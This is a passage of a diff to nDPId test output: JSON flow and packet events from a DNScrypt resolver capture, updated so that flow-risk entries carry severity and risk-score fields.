AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQwAuX4Rb\/AKAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":562,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAAXcaQ0gAH4RSxwKAAABTUJU6d8VAbsGBEgCsp0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQ0AuX4Rb+8KAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoa1AADYRp\/25wX\/0CgAAAQG7tOoAvNxR\/I6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"}
@@ -1167,118 +1167,118 @@
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":946739400551,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739400551,"pkt":"ZmZmZmZmRERERERECABFAADcDmkAADYREsFNQlTpCgAAAQG7wkQAyKDDspyBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAHTELXM+13EPB+IE+zJ9PQOXdJ7IKBJfAx72Wd7gihP8hRGtsF77cDm0yhz652JqAFc0tI+h6KATFWPKnD7HPQCiR1MNmirJFbpEf5fuBV5xkfCiHCm163IIgp4yvCcsa6NHUw2aKskVX1OfeV9Tn3lfVPD5"}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":946739400553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739400553,"pkt":"ZmZmZmZmRERERERECABFAADcDmsAADYREr9NQlTpCgAAAQG7xkUAyJzDspuBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAHTELXM+13EPB+IE+zJ9PQOXdJ7IKBJfAx72Wd7gihP8hRGtsF77cDm0yhz652JqAFc0tI+h6KATFWPKnD7HPQCiR1MNmirJFbpEf5fuBV5xkfCiHCm163IIgp4yvCcsa6NHUw2aKskVX1OfeV9Tn3lfVPD5"}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":946739400553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739400553,"pkt":"ZmZmZmZmRERERERECABFAADcDmwAADYREr5NQlTpCgAAAQG73xUAyIPxsp2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAHTELXM+13EPB+IE+zJ9PQOXdJ7IKBJfAx72Wd7gihP8hRGtsF77cDm0yhz652JqAFc0tI+h6KATFWPKnD7HPQCiR1MNmirJFbpEf5fuBV5xkfCiHCm163IIgp4yvCcsa6NHUw2aKskVX1OfeV9Tn3lfVPD5"}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305192,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312183,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305329,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305348,"flow_last_seen":946739305453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00727{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
